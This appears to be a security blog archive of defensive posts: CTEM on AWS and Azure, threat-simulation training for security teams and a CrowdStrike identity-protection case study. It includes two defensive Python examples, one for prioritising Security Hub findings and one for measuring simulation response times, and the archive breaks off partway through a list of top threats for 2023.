Mar 21 2024

HACK-PROOF YOUR CLOUD: THE STEP-BY-STEP CONTINUOUS THREAT EXPOSURE MANAGEMENT CTEM STRATEGY FOR AWS & AZURE

Continuous Threat Exposure Management (CTEM) is an evolving cybersecurity practice focused on identifying, assessing, prioritizing, and addressing security weaknesses and vulnerabilities in an organization’s digital assets and networks continuously. Unlike traditional approaches that might assess threats periodically, CTEM emphasizes a proactive, ongoing process of evaluation and mitigation to adapt to the rapidly changing threat landscape. Here’s a closer look at its key components:

  1. Identification: CTEM starts with the continuous identification of all digital assets within an organization’s environment, including on-premises systems, cloud services, and remote endpoints. It involves understanding what assets exist, where they are located, and their importance to the organization.
  2. Assessment: Regular and ongoing assessments of these assets are conducted to identify vulnerabilities, misconfigurations, and other security weaknesses. This process often utilizes automated scanning tools and threat intelligence to detect issues that could be exploited by attackers.
  3. Prioritization: Not all vulnerabilities pose the same level of risk. CTEM involves prioritizing these weaknesses based on their severity, the value of the affected assets, and the potential impact of an exploit. This helps organizations focus their efforts on the most critical issues first.
  4. Mitigation and Remediation: Once vulnerabilities are identified and prioritized, CTEM focuses on mitigating or remedying these issues. This can involve applying patches, changing configurations, or implementing other security measures to reduce the risk of exploitation.
  5. Continuous Improvement: CTEM is a cyclical process that feeds back into itself. The effectiveness of mitigation efforts is assessed, and the approach is refined over time to improve security posture continuously.

The goal of CTEM is to reduce the “attack surface” of an organization—minimizing the number of vulnerabilities that could be exploited by attackers and thereby reducing the organization’s overall risk. By continuously managing and reducing exposure to threats, organizations can better protect against breaches and cyber attacks.

CTEM VS. ALTERNATIVE APPROACHES

Continuous Threat Exposure Management (CTEM) represents a proactive and ongoing approach to managing cybersecurity risks, distinguishing itself from traditional, more reactive security practices. Understanding the differences between CTEM and alternative approaches can help organizations choose the best strategy for their specific needs and threat landscapes. Let’s compare CTEM with some of these alternative approaches:

1. CTEM VS. PERIODIC SECURITY ASSESSMENTS

  • Periodic Security Assessments typically involve scheduled audits or evaluations of an organization’s security posture at fixed intervals (e.g., quarterly or annually). This approach may fail to catch new vulnerabilities or threats that emerge between assessments, leaving organizations exposed for potentially long periods.
  • CTEM, on the other hand, emphasizes continuous monitoring and assessment of threats and vulnerabilities. It ensures that emerging threats can be identified and addressed in near real-time, greatly reducing the window of exposure.

2. CTEM VS. PENETRATION TESTING

  • Penetration Testing is a targeted approach where security professionals simulate cyber-attacks on a system to identify vulnerabilities. While valuable, penetration tests are typically conducted annually or semi-annually and might not uncover vulnerabilities introduced between tests.
  • CTEM complements penetration testing by continuously scanning for and identifying vulnerabilities, ensuring that new threats are addressed promptly and not just during the next scheduled test.

3. CTEM VS. INCIDENT RESPONSE PLANNING

  • Incident Response Planning focuses on preparing for, detecting, responding to, and recovering from cybersecurity incidents. It’s reactive by nature, kicking into gear after an incident has occurred.
  • CTEM works upstream of incident response by aiming to prevent incidents before they happen through continuous threat and vulnerability management. While incident response is a critical component of a comprehensive cybersecurity strategy, CTEM can reduce the likelihood and impact of incidents occurring in the first place.

4. CTEM VS. TRADITIONAL VULNERABILITY MANAGEMENT

  • Traditional Vulnerability Management involves identifying, classifying, remediating, and mitigating vulnerabilities within software and hardware. While it can be an ongoing process, it often lacks the continuous, real-time monitoring and prioritization framework of CTEM.
  • CTEM enhances traditional vulnerability management by integrating it into a continuous cycle that includes real-time detection, prioritization based on current threat intelligence, and immediate action to mitigate risks.

KEY ADVANTAGES OF CTEM

  • Real-Time Threat Intelligence: CTEM integrates the latest threat intelligence to ensure that the organization’s security measures are always ahead of potential threats.
  • Automation and Integration: By leveraging automation and integrating various security tools, CTEM can streamline the process of threat and vulnerability management, reducing the time from detection to remediation.
  • Risk-Based Prioritization: CTEM prioritizes vulnerabilities based on their potential impact on the organization, ensuring that resources are allocated effectively to address the most critical issues first.

CTEM offers a comprehensive and continuous approach to cybersecurity, focusing on reducing exposure to threats in a dynamic and ever-evolving threat landscape. While alternative approaches each have their place within an organization’s overall security strategy, integrating them with CTEM principles can provide a more resilient and responsive defense mechanism against cyber threats.

CTEM IN AWS

Implementing Continuous Threat Exposure Management (CTEM) within an AWS Cloud environment involves leveraging AWS services and tools, alongside third-party solutions and best practices, to continuously identify, assess, prioritize, and remediate vulnerabilities and threats. Here’s a detailed example of how CTEM can be applied in AWS:

1. IDENTIFICATION OF ASSETS

  • AWS Config: Use AWS Config to continuously monitor and record AWS resource configurations and changes, helping to identify which assets exist in your environment, their configurations, and their interdependencies.
  • AWS Resource Groups: Organize resources by applications, projects, or environments to simplify management and monitoring.

2. ASSESSMENT

  • Amazon Inspector: Automatically assess applications for vulnerabilities or deviations from best practices, especially important for EC2 instances and container-based applications.
  • AWS Security Hub: Aggregates security alerts and findings from various AWS services (like Amazon Inspector, Amazon GuardDuty, and IAM Access Analyzer) and supported third-party solutions to give a comprehensive view of your security and compliance status.

3. PRIORITIZATION

  • AWS Security Hub: Provides a consolidated view of security alerts and findings rated by severity, allowing you to prioritize issues based on their potential impact on your AWS environment.
  • Custom Lambda Functions: Create AWS Lambda functions to automate the analysis and prioritization process, using criteria specific to your organization’s risk tolerance and security posture.

4. MITIGATION AND REMEDIATION

  • AWS Systems Manager Patch Manager: Automate the process of patching managed instances with both security and non-security related updates.
  • CloudFormation Templates: Use AWS CloudFormation to enforce infrastructure configurations that meet your security standards. Quickly redeploy configurations if deviations are detected.
  • Amazon EventBridge and AWS Lambda: Automate responses to security findings. For example, if Security Hub detects a critical vulnerability, EventBridge can trigger a Lambda function to isolate affected instances or apply necessary patches.

5. CONTINUOUS IMPROVEMENT

  • AWS Well-Architected Tool: Regularly review your workloads against AWS best practices to identify areas for improvement.
  • Feedback Loop: Implement a feedback loop using AWS CloudWatch Logs and Amazon Elasticsearch Service to analyze logs and metrics for security insights, which can inform the continuous improvement of your CTEM processes.

IMPLEMENTING CTEM IN AWS: AN EXAMPLE SCENARIO

Imagine you’re managing a web application hosted on AWS. Here’s how CTEM comes to life:

  • Identification: Use AWS Config and Resource Groups to maintain an updated inventory of your EC2 instances, RDS databases, and S3 buckets critical to your application.
  • Assessment: Employ Amazon Inspector to regularly scan your EC2 instances for vulnerabilities and AWS Security Hub to assess your overall security posture across services.
  • Prioritization: Security Hub alerts you to a critical vulnerability in an EC2 instance running your application backend. It’s flagged as high priority due to its access to sensitive data.
  • Mitigation and Remediation: You automatically trigger a Lambda function through EventBridge based on the Security Hub finding, which isolates the affected EC2 instance and initiates a patching process via Systems Manager Patch Manager.
  • Continuous Improvement: Post-incident, you use the AWS Well-Architected Tool to evaluate your architecture. Insights gained lead to the implementation of stricter IAM policies and enhanced monitoring with CloudWatch and Elasticsearch for anomaly detection.

This cycle of identifying, assessing, prioritizing, mitigating, and continuously improving forms the core of CTEM in AWS, helping to ensure that your cloud environment remains secure against evolving threats.
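The prioritization and remediation steps above (a Security Hub finding arriving through EventBridge, a Lambda function scoring it against organization-specific criteria and deciding whether to isolate and patch) can be illustrated in code. The following is an added example, not code from the original post or from AWS: the event shape follows the AWS Security Finding Format (ASFF) as EventBridge delivers it, while the tag names (DataClassification, Environment), the score weights, the thresholds and the action catalogue are assumptions an organization would set for itself, and the cloud calls sit behind an injectable executor so the module runs offline.

```python
"""Prioritise Security Hub findings and plan remediation, EventBridge -> Lambda style.
Added illustration, not the post's or AWS's code. Event shape follows ASFF as delivered
by the "Security Hub Findings - Imported" detail type; tag names, weights, thresholds and
the action catalogue are assumptions. Cloud calls sit behind an injectable executor."""
from dataclasses import dataclass, field
from typing import Callable, Dict, List

# Assumed weighting: ASFF severity label is the base, resource tags add a bonus.
SEVERITY_BASE = {"CRITICAL": 90, "HIGH": 70, "MEDIUM": 40, "LOW": 10, "INFORMATIONAL": 0}
SENSITIVITY_BONUS = {"restricted": 25, "confidential": 15, "internal": 5, "public": 0}
ENV_BONUS = {"prod": 10, "staging": 3, "dev": 0}
ISOLATE_THRESHOLD = 95  # assumed: isolate the instance before patching
PATCH_THRESHOLD = 60    # assumed: hand the instance to Patch Manager

@dataclass
class Action:
    kind: str         # "isolate_instance" or "patch_instance"
    resource_id: str  # EC2 instance id the action targets
    reason: str

@dataclass
class Plan:
    finding_id: str
    score: int
    priority: str
    actions: List[Action] = field(default_factory=list)

def score_finding(finding: Dict) -> int:
    """Combine ASFF severity with the most sensitive tagged resource (0-100)."""
    label = finding.get("Severity", {}).get("Label", "INFORMATIONAL").upper()
    bonus = 0
    for res in finding.get("Resources", []):
        tags = {k.lower(): v.lower() for k, v in res.get("Tags", {}).items()}
        bonus = max(bonus, SENSITIVITY_BONUS.get(tags.get("dataclassification", ""), 0)
                    + ENV_BONUS.get(tags.get("environment", ""), 0))
    return min(100, SEVERITY_BASE.get(label, 0) + bonus)

def priority_band(score: int) -> str:
    """Map a score onto the response queue (assumed P1-P4 bands)."""
    if score >= ISOLATE_THRESHOLD:
        return "P1"
    if score >= PATCH_THRESHOLD:
        return "P2"
    return "P3" if score >= 30 else "P4"

def plan_remediation(finding: Dict) -> Plan:
    """Decide which automated actions a finding warrants; EC2 only, by design."""
    score = score_finding(finding)
    plan = Plan(finding["Id"], score, priority_band(score))
    for res in finding.get("Resources", []):
        if res.get("Type") != "AwsEc2Instance":
            continue  # other resource types stay with human triage
        instance_id = res["Id"].rsplit("/", 1)[-1]  # ARN ends in .../instance/i-...
        if score >= ISOLATE_THRESHOLD:
            plan.actions.append(Action("isolate_instance", instance_id,
                                       f"score {score} >= {ISOLATE_THRESHOLD}"))
        if score >= PATCH_THRESHOLD:
            plan.actions.append(Action("patch_instance", instance_id,
                                       f"score {score} >= {PATCH_THRESHOLD}"))
    return plan

def handle_event(event: Dict, executor: Callable[[Action], None]) -> List[Plan]:
    """Lambda-style entry point: plan and execute for every finding still marked NEW,
    so a re-imported or already-resolved finding cannot trigger a second isolation."""
    plans = []
    for finding in event.get("detail", {}).get("findings", []):
        if finding.get("Workflow", {}).get("Status", "NEW") != "NEW":
            continue
        plan = plan_remediation(finding)
        for action in plan.actions:
            executor(action)  # in a real deployment the EC2/SSM calls go here
        plans.append(plan)
    return plans

# Constructed sample event (not a real capture): a critical EC2 finding on a production
# backend, a medium S3 finding, and an already-resolved EC2 finding that must be skipped.
EC2_ARN = "arn:aws:ec2:us-east-1:123456789012:instance/"
SAMPLE_EVENT = {
    "detail-type": "Security Hub Findings - Imported",
    "detail": {"findings": [
        {"Id": "finding-001", "Severity": {"Label": "CRITICAL"}, "Workflow": {"Status": "NEW"},
         "Resources": [{"Type": "AwsEc2Instance", "Id": EC2_ARN + "i-0abc123def456789a",
                        "Tags": {"DataClassification": "Restricted", "Environment": "prod"}}]},
        {"Id": "finding-002", "Severity": {"Label": "MEDIUM"}, "Workflow": {"Status": "NEW"},
         "Resources": [{"Type": "AwsS3Bucket", "Id": "arn:aws:s3:::example-static-assets",
                        "Tags": {"DataClassification": "Public", "Environment": "dev"}}]},
        {"Id": "finding-003", "Severity": {"Label": "HIGH"}, "Workflow": {"Status": "RESOLVED"},
         "Resources": [{"Type": "AwsEc2Instance", "Id": EC2_ARN + "i-0fedcba987654321f"}]},
    ]},
}

if __name__ == "__main__":
    for p in handle_event(SAMPLE_EVENT, lambda a: print("EXECUTE", a)):
        print(p.finding_id, p.score, p.priority, [a.kind for a in p.actions])
```

The Workflow.Status check is what keeps the automation idempotent when Security Hub re-imports a finding; the same guard belongs in any production handler.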

CTEM IN AZURE

Implementing Continuous Threat Exposure Management (CTEM) in Azure involves utilizing a range of Azure services and features designed to continuously identify, assess, prioritize, and mitigate security risks. Below is a step-by-step example illustrating how an organization can apply CTEM principles within the Azure cloud environment:

STEP 1: ASSET IDENTIFICATION AND MANAGEMENT

  • Azure Resource Graph: Use Azure Resource Graph to query and visualize all resources across your Azure environment. This is crucial for understanding what assets you have, their configurations, and their interrelationships.
  • Azure Tags: Implement tagging strategies to categorize resources based on sensitivity, department, or environment. This aids in the prioritization process later on.

STEP 2: CONTINUOUS VULNERABILITY ASSESSMENT

  • Azure Security Center: Enable Azure Security Center (ASC) at the Standard tier to conduct continuous security assessments across your Azure resources. ASC provides security recommendations and assesses your resources for vulnerabilities and misconfigurations.
  • Azure Defender: Integrated into Azure Security Center, Azure Defender provides advanced threat protection for workloads running in Azure, including virtual machines, databases, and containers.

STEP 3: PRIORITIZATION OF RISKS

  • ASC Secure Score: Use the Secure Score in Azure Security Center as a metric to prioritize security recommendations based on their potential impact on your environment’s security posture.
  • Custom Logic with Azure Logic Apps: Develop custom workflows using Azure Logic Apps to prioritize alerts based on your organization’s specific criteria, such as asset sensitivity or compliance requirements.

STEP 4: AUTOMATED REMEDIATION

  • Azure Automation: Employ Azure Automation to run remediation scripts or configuration management across your Azure VMs and services. This can be used to automatically apply patches, update configurations, or manage access controls in response to identified vulnerabilities.
  • Azure Logic Apps: Trigger automated workflows in response to security alerts. For example, if Azure Security Center identifies unprotected data storage, an Azure Logic App can automatically initiate a workflow to apply the necessary encryption settings.

STEP 5: CONTINUOUS MONITORING AND INCIDENT RESPONSE

  • Azure Monitor: Utilize Azure Monitor to collect, analyze, and act on telemetry data from your Azure resources. This includes logs, metrics, and alerts that can help you detect and respond to threats in real-time.
  • Azure Sentinel: Deploy Azure Sentinel, a cloud-native SIEM service, for a more comprehensive security information and event management solution. Sentinel can collect data across all users, devices, applications, and infrastructure, both on-premises and in multiple clouds.

STEP 6: CONTINUOUS IMPROVEMENT AND COMPLIANCE

  • Azure Policy: Implement Azure Policy to enforce organizational standards and to assess compliance at scale. Continuous evaluation of your configurations against these policies ensures compliance and guides ongoing improvement.
  • Feedback Loops: Establish feedback loops using the insights gained from Azure Monitor, Azure Security Center, and Azure Sentinel to refine and improve your security posture continuously.

EXAMPLE SCENARIO: SECURING A WEB APPLICATION IN AZURE

Let’s say you’re managing a web application hosted in Azure, utilizing Azure App Service for the web front end, Azure SQL Database for data storage, and Azure Blob Storage for unstructured data.

  • Identification: You catalog all resources related to the web application using Azure Resource Graph and apply tags based on sensitivity and function.
  • Assessment: Azure Security Center continuously assesses these resources for vulnerabilities, such as misconfigurations or outdated software.
  • Prioritization: Based on the Secure Score and custom logic in Azure Logic Apps, you prioritize a detected SQL injection vulnerability in Azure SQL Database as critical.
  • Mitigation: Azure Automation is triggered to isolate the affected database and apply a patch. Concurrently, Azure Logic Apps notifies the security team and logs the incident for review.
  • Monitoring: Azure Monitor and Azure Sentinel provide ongoing surveillance, detecting any unusual access patterns or potential breaches.
  • Improvement: Insights from the incident lead to a review and enhancement of the application’s code and a reinforcement of security policies through Azure Policy to prevent similar vulnerabilities in the future.

By following these steps and utilizing Azure’s comprehensive suite of security tools, organizations can implement an effective CTEM strategy that continuously protects against evolving cyber threats.

IMPLEMENTING CTEM IN CLOUD ENVIRONMENTS LIKE AWS AND AZURE

Implementing Continuous Threat Exposure Management (CTEM) in cloud environments like AWS and Azure involves a series of strategic steps, leveraging each platform’s unique tools and services. The approach combines best practices for security and compliance management, automation, and continuous monitoring. Here’s a guide to get started with CTEM in both AWS and Azure:

COMMON STEPS FOR BOTH AWS AND AZURE

  1. Understand Your Environment
    • Catalogue your cloud resources and services.
    • Understand the data flow and dependencies between your cloud assets.
  2. Define Your Security Policies and Objectives
    • Establish what your security baseline looks like.
    • Define key compliance requirements and security objectives.
  3. Integrate Continuous Monitoring Tools
    • Leverage cloud-native tools for threat detection, vulnerability assessment, and compliance monitoring.
    • Integrate third-party security tools if necessary for enhanced capabilities.
  4. Automate Security Responses
    • Implement automated responses to common threats and vulnerabilities.
    • Use cloud services to automate patch management and configuration adjustments.
  5. Continuously Assess and Refine
    • Regularly review security policies and controls.
    • Adjust based on new threats, technological advancements, and changes in the business environment.

IMPLEMENTING CTEM IN AWS

  1. Enable AWS Security Services
    • Utilize AWS Security Hub for a comprehensive view of your security state and to centralize and prioritize security alerts.
    • Use Amazon Inspector for automated security assessments to help find vulnerabilities or deviations from best practices.
    • Implement AWS Config to continuously monitor and record AWS resource configurations.
  2. Automate Response with AWS Lambda
    • Use AWS Lambda to automate responses to security findings, such as isolating compromised instances or automatically patching vulnerabilities.
  3. Leverage Amazon CloudWatch
    • Employ CloudWatch for monitoring and alerting based on specific metrics or logs that indicate potential security threats.

IMPLEMENTING CTEM IN AZURE

  1. Utilize Azure Security Tools
    • Activate Azure Security Center for continuous assessment and security recommendations. Use its advanced threat protection features to detect and mitigate threats.
    • Implement Azure Sentinel for SIEM (Security Information and Event Management) capabilities, integrating it with other Azure services for a comprehensive security analysis and threat detection.
  2. Automate with Azure Logic Apps
    • Use Azure Logic Apps to automate responses to security alerts, such as sending notifications or triggering remediation processes.
  3. Monitor with Azure Monitor
    • Leverage Azure Monitor to collect, analyze, and act on telemetry data from your Azure and on-premises environments, helping you detect and respond to threats in real-time.

BEST PRACTICES FOR BOTH ENVIRONMENTS

  • Continuous Compliance: Use policy-as-code to enforce and automate compliance standards across your cloud environments.
  • Identity and Access Management (IAM): Implement strict IAM policies to ensure least privilege access and utilize multi-factor authentication (MFA) for enhanced security.
  • Encrypt Data: Ensure data at rest and in transit is encrypted using the cloud providers’ encryption capabilities.
  • Educate Your Team: Regularly train your team on the latest cloud security best practices and the specific tools and services you are using.

Implementing CTEM in AWS and Azure requires a deep understanding of each cloud environment’s unique features and capabilities. By leveraging the right mix of tools and services, organizations can create a robust security posture that continuously identifies, assesses, and mitigates threats.


InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: AWS, AWS security, Azure, Azure Security, cloud security


Sep 25 2023

Hands-on threat simulations: Empower cybersecurity teams to confidently combat threats

Category: Threat detection, Threat Modeling | disc7 @ 11:37 am

With the rising number of cyber-attacks, organizations must make sure they are ready to defend themselves. That means equipping cybersecurity teams with sufficient skills to identify and effectively stop an attack in its tracks. Worryingly, only 17% of tech workers are completely confident in their cybersecurity skills, while 21% have no confidence at all. Given that 74% of data breaches are caused by human error, it is crucial that upskilling practices are in place.

One of the best ways to develop the necessary skills is through hands-on learning which allows employees to practice in a low-risk environment and better understand the methods used by cyber-attackers. This kind of experience is vital for security teams to be able to anticipate threats and capably protect the business.

The importance of testing security teams’ skills

Automated defense technologies are highly effective for commodity threats – those which are based on programs that are readily available and require no customization to launch an attack. But integrating AI/ML capabilities into security operations can generate a false sense of security. Attackers can still create the exact same program with millions of different file hashes or apply human ingenuity to evade known defenses.

Anti-virus is built on a massive signature-database-shaped house of cards that easily crumbles by changing text within programs. The same applies to network signatures and to endpoint detection and response. There are certain behaviors that traditional defense technologies focus on, but ultimately, malware is just software. The more it can blend into common software activity, the less likely it is that an attack will be detected. And this is easier than it seems.

Security teams need easily replicable techniques to emulate threat scenarios to test their defense skills against the skill level of cyber-attackers. Testing is how businesses find out the cybersecurity teams’ skill level without waiting for a breach.

At least yearly, there should be a full red team assessment; the red team is made up of offensive security professionals whose role is to exploit the company’s vulnerabilities and overcome cybersecurity controls. But given attackers always operate in real time, there should be a weekly exercise for individual tactics, techniques and procedures (TTPs).

Start with the basics

Even the most advanced cyberattacks leverage basic techniques that have been around for years. Businesses need to focus on fully leveraging the tools they have to detect even the most basic of techniques and then move their way up to more advanced techniques from there. That will remove the most common threat from the equation first. This allows them time to identify and build the expertise and infrastructure required to be mature enough to defend against the most advanced or dangerous threats.

Anticipate the risk by using threat simulation learning models

One example of such an exercise is a blue team friendly attack simulation. The blue team here refers to security experts who are aware of the organization’s objectives and security strategy and are trying to defend and respond to attacks performed by the red team. One group poses as the opposing force, or in this case, cyber criminals, while testing the ability of the defenders to detect and protect against such attacks.

However, these types of simulations are performed on extensive cyber ranges that take a lot of time and effort to create, and don’t always accurately reflect the enterprise environment. In addition, they require security teams to take several days off to play through the exercise. The quality of these simulations depends on the team that developed them and the complexity of the available cyber range resources. The rapid evolution of threats means that the work cyber teams do can have a short shelf life, as does the ability to properly prepare defenders.

Defenders need to be able to rapidly test against new tactics and techniques in their everyday environment. This allows them to check the efficacy of their monitoring tools, as well as their people and processes, on an ongoing basis and against current threats. This is important to the concept of ‘becoming the threat’. What cybersecurity teams really need is the ability to test individual tactics in their organization’s live environment, without the overhead of a full red team exercise.

Hone skills and build confidence through hands-on learning

Simulations are a good way to understand how to best defend and respond against different attacks and determine whether employees need to upskill. At its most basic level, if the blue team wins, they can be confident when it comes to a cybersecurity threat. But if they lose, the organization still has work to do to improve its defense strategy.

When simulating various TTPs, you can categorize them in two ways: first by the level of expertise required to perform the specific attack, and second by the area, or type of data, in which the attack should be detected.

The concept of defense in depth is that even if you miss one component of an attack, you can ideally catch others, so that you can prevent the attackers from achieving their goal. Measurement is based on the time it takes for a team to detect and respond to a particular TTP once launched, broken down by category of the technique. Skill, process, and technology gaps can then be mapped by identifying where response times were slow, or where there was no response at all.
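The measurement described above (time to detect and time to respond per launched TTP, grouped along the two axes of expertise level and detection area, with undetected or uncontained runs surfaced as gaps) is straightforward to automate over the results of a weekly exercise. The block below is an added example and not code from the original article or any vendor; the TTP names, timestamps, category labels and the 30-minute response target are constructed assumptions.

```python
"""Measure a week of TTP simulations: time to detect and respond, by category, plus gaps.
Added illustration, not code from the original article or from any vendor. TTP names,
timestamps, category labels and the 30-minute response target are constructed assumptions."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import median
from typing import Dict, List, Optional

RESPONSE_TARGET = timedelta(minutes=30)  # assumed containment target after launch

@dataclass
class Simulation:
    ttp: str
    expertise: str                 # first axis: skill needed to perform the attack
    data_area: str                 # second axis: where the attack should be detected
    launched: datetime
    detected: Optional[datetime]   # None = never detected
    responded: Optional[datetime]  # None = never contained

@dataclass
class CategoryResult:
    runs: int
    missed: int                      # launched but never detected
    unresolved: int                  # detected but never contained
    over_target: int                 # contained, but slower than RESPONSE_TARGET
    median_ttd_min: Optional[float]  # median minutes from launch to detection
    median_ttr_min: Optional[float]  # median minutes from launch to containment

def _minutes(later: datetime, earlier: datetime) -> float:
    return (later - earlier).total_seconds() / 60

def summarize(sims: List[Simulation], axis: str) -> Dict[str, CategoryResult]:
    """Group runs by 'expertise' or 'data_area' and measure detection/response per group."""
    groups: Dict[str, List[Simulation]] = {}
    for s in sims:
        groups.setdefault(getattr(s, axis), []).append(s)
    results = {}
    for key, runs in groups.items():
        ttd = [_minutes(s.detected, s.launched) for s in runs if s.detected]
        ttr = [_minutes(s.responded, s.launched) for s in runs if s.responded]
        results[key] = CategoryResult(
            runs=len(runs),
            missed=sum(1 for s in runs if s.detected is None),
            unresolved=sum(1 for s in runs if s.detected and s.responded is None),
            over_target=sum(1 for s in runs
                            if s.responded and s.responded - s.launched > RESPONSE_TARGET),
            median_ttd_min=median(ttd) if ttd else None,
            median_ttr_min=median(ttr) if ttr else None,
        )
    return results

def gaps(results: Dict[str, CategoryResult]) -> List[str]:
    """Categories that need work: anything undetected, uncontained or slower than target."""
    flagged = []
    for key, r in sorted(results.items()):
        if r.missed:
            flagged.append(f"{key}: {r.missed}/{r.runs} undetected")
        if r.unresolved:
            flagged.append(f"{key}: {r.unresolved}/{r.runs} detected but not contained")
        if r.over_target:
            flagged.append(f"{key}: {r.over_target}/{r.runs} contained slower than target")
    return flagged

# Constructed results of one weekly exercise (not real data).
T0 = datetime(2023, 9, 18, 9, 0)

def at(minutes: int) -> datetime:
    return T0 + timedelta(minutes=minutes)

SAMPLE_RUNS = [
    Simulation("phishing attachment", "basic", "endpoint", at(0), at(5), at(20)),
    Simulation("credential access on host", "intermediate", "endpoint", at(60), at(72), at(110)),
    Simulation("covert outbound channel", "intermediate", "network", at(120), None, None),
    Simulation("directory enumeration", "advanced", "identity", at(180), at(188), None),
]

if __name__ == "__main__":
    for axis in ("data_area", "expertise"):
        for key, result in summarize(SAMPLE_RUNS, axis).items():
            print(axis, key, result)
    print(gaps(summarize(SAMPLE_RUNS, "data_area")))
```

Running the same runs through both axes shows why the two categorizations matter: the network gap appears under "intermediate" on the expertise axis but under "network" on the data-area axis, which points at telemetry rather than analyst skill.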

Up to date skills central to staying ahead of the hackers

Cyber teams play a constant cat and mouse game to keep up with the evolving threat landscape. However, organizations can adopt specific practices to ensure teams have the built-in skills to defend against cyber-attacks and protect the business.

Providing employees with first-hand experience of how a cyber-attack plays out can break down the barrier between the defender and the attacker, helping teams better understand the threat and anticipate the risks. This type of learning pathway is crucial for an organization that needs to know how well equipped its teams are for when a cyber-attack inevitably occurs. Only then can the organization decide whether to fill skills gaps with additional training or whether its current level of expertise is enough to protect the business.

When it comes to cyber-attacks, security teams must act extremely quickly to minimize the impact in stressful environments. Hands-on threat simulations will arm cybersecurity experts with the skills and confidence necessary to react to a cyber-attack calmly and efficiently, whilst protecting the company’s sensitive data and avoiding costly damages.


Tags: CYBERSECURITY INCIDENT MANAGEMENT MASTERS GUIDE, threat simulations


Feb 09 2023

9 Ways a CISO Uses CrowdStrike for Identity Threat Protection

https://www.crowdstrike.com/blog/9-ways-a-public-sector-ciso-uses-crowdstrike-identity-threat-protection/

Identity isn’t a security problem — it’s the security problem. 

This was the takeaway from my recent meeting with a local government CISO in the Washington, D.C. area. Tasked with protecting infrastructure, including the fire and police departments, the CISO turned to CrowdStrike a year ago for endpoint and identity protection.

The CISO outlined the main challenge his team faced: the managed detection and response (MDR) solution in use at the time was unable to keep up with modern security demands. The tool didn’t deliver the speed or fidelity he needed. Nor did it provide remediation, leading to long delays between when the tool sent data to the management console and when his thinly stretched security team could investigate and triage alerts.

CrowdStrike Falcon® Complete solved these problems by providing a bundle of Falcon modules on AWS GovCloud, complete with a virtual team of experts to administer the technology and quickly eliminate threats.

“There’s a complete difference between our previous MDR and CrowdStrike Falcon Complete. One gives me work to do. The other tells me the work is done.” – CISO, a county in the Washington, D.C. area

Identity Is the New Perimeter

Of everything the CISO shared, it was the identity piece that really stood out to me. According to the CrowdStrike 2022 Global Threat Report, nearly 80% of cyberattacks leveraged compromised credentials — a trend the county sees regularly, he said. 

With Falcon Complete, the CISO gets CrowdStrike Falcon® Identity Threat Protection to stop identity-based attacks, both through services performed by CrowdStrike and via work done by his security operations center (SOC) team.

Check out this live attack and defend demo by the Falcon Complete team to see Falcon Identity Threat Protection in action.

Below are nine use cases for the identity protection capability, in his own words.

1. We receive executive-level key metrics on identity risks. Falcon Identity Threat Protection provides us immediate value with real-time metrics on total compromised passwords, stale accounts and privileged accounts. As these numbers decrease, our risk and expenditures drop as well, allowing us to prove the value of our cybersecurity investments to stakeholders.

2. We get powerful policies and analytics. Falcon Identity Threat Protection helped us move away from reactive, once-a-year privileged account analysis to proactive real-time analysis of all of our identities, including protocol usage such as Remote Desktop Protocol (RDP) to DCs/critical servers. Many attacks leverage compromised stale accounts, and with Falcon Identity Threat Protection we can monitor and be alerted to stale accounts that become active.

3. We can stop malicious authentications. With Falcon Identity Threat Protection, we can enforce frictionless, risk-based multifactor authentication (MFA) when a privileged user remotely connects to a server — stopping adversaries trying to move laterally. Additionally, we can define policies to reset passwords or block/challenge an authentication from stale or high-risk accounts.

“I’ve bought a lot of cyber tools. My analysts unanimously thanked me the day we bought CrowdStrike.”

4. We can alert system admins to critical issues. Adversaries often target critical accounts. Instead of simply alerting the security team, Falcon Identity Threat Protection allows us to flag critical accounts with specific policies and alerts that can be sent directly to the account owner. For example, the owner of a critical admin account for our organization’s financial systems can be alerted to anomalous behavior around that account, eliminating the need for the security team to reach out to her for every alert.

5. We can investigate behavior and hygiene issues. When reviewing RDP sessions from the last 24 hours, we noticed a former employee, Steve Smith (names changed), remotely accessing a server in our environment from Jane Doe’s computer. Upon investigation, we found Jane Doe was legitimately using Steve Smith’s credentials to perform business functions that Steve was no longer around to perform. We immediately tied Jane’s account to Steve’s to trigger MFA for any authentication. We also reviewed Steve’s permissions and noticed he had extensive local administrator privileges to over 600 computers, which we were able to remove instantly.

6. We can eliminate attack paths to critical accounts. It takes only one user’s credentials to compromise your organization. In previous phishing campaigns that asked users to reset their passwords, 7% of our employees entered their username and password into a fake Microsoft login screen. Falcon Identity Threat Protection shows us how one username and password dump from a single machine can lead to the compromise of a highly privileged account, allowing for full, unfettered access to an enterprise network. We now have the ability to visualize how a low-level account compromise can lead to a full-scale breach.

“Within two hours of deploying Falcon Identity Threat Protection, we identified 10 privileged accounts with compromised passwords and began resetting them immediately.”

7. We gain awareness of AD incidents. With Falcon Identity Threat Protection, we can now see credential scanning and password attacks on all of our external-facing systems that link to our Microsoft AD and Azure AD logins.

8. We can verify if lockouts are actually malicious. Every day, we face a handful of account lockouts, mostly due to users forgetting their passwords or a system that continues to authenticate after the user has reset their password. With Falcon Identity Threat Protection, we can see all account lockouts and failed authentications, allowing us to immediately understand why a lockout occurred and if malicious activity was involved.

9. We can correlate endpoint and identity activity. Once an alert fires off regarding a potentially misused identity, such as a stale account becoming active after 90+ days of inactivity, we can correlate this information with endpoint-related detections. We simply grab the hostname where the stale account became active, pivot to CrowdStrike Falcon® Insight XDR, and look for malicious activity and detections on a specific machine. Likewise, if a machine becomes infected, we can use Falcon Identity Threat Protection to investigate who has access to that machine and whether their behavior is normal. This integration is not only unique but essential with identity-based attacks.

“CrowdStrike not only revolutionized the way our SOC operates, it changed the way I sleep at night.”

Tags: CrowdStrike, Threat Protection


Nov 14 2022

Top cybersecurity threats for 2023


Going into 2023, cybersecurity is still topping the list of CIO concerns. This comes as no surprise. In the first half of 2022, there were 2.8 billion worldwide malware attacks and 236.1 ransomware attacks. By year end 2022, it is expected that six billion phishing attacks will have been launched.


Here are eight top security threats that IT is likely to see in 2023.

Top 8 security threats for next year

1. Malware

Malware is malicious software that is injected into networks and systems with the intention of causing disruption to computers, servers, workstations and networks. Malware can extract confidential information, deny service and gain access to systems.

IT departments use security software and firewalls to monitor and intercept malware before it gains entry to networks and systems, but malware bad actors continue to evolve ways to elude these defenses. That makes maintaining current updates to security software and firewalls essential.

2. Ransomware

